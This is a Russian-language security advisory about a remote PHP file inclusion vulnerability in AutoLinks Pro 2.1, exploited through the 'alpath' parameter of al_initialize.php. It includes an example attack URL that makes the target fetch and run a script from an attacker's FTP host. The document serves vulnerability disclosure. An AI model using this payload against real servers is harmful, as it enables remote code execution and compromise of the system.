Security Lab

PHP инклюдинг в AutoLinks Pro

Дата публикации:01.09.2005
Дата изменения:17.10.2006
Всего просмотров:3014
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: AutoLinks Pro 2.x
Уязвимые версии: AutoLinks Pro 2.1

Описание:
Уязвимость позволяет удаленному пользователь выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера.

Уязвимость существует в сценарии 'autolinks/al_initialize.php' при обработке входных данных в параметре 'alpath' при включенной опции register_globals в конфигурационном файле php.ini. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера. Пример:

http://[target]/al_initialize.php?alpath=ftp://[attacker]/

Примечание: Сценарий атакующего должен быть назван 'al_functions.php'.

URL производителя: www.scriptscenter.com/autolinks/

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: [NewAngels Advisory #1] AutoLinks Pro 2.1 - Remote File Include Vulnerability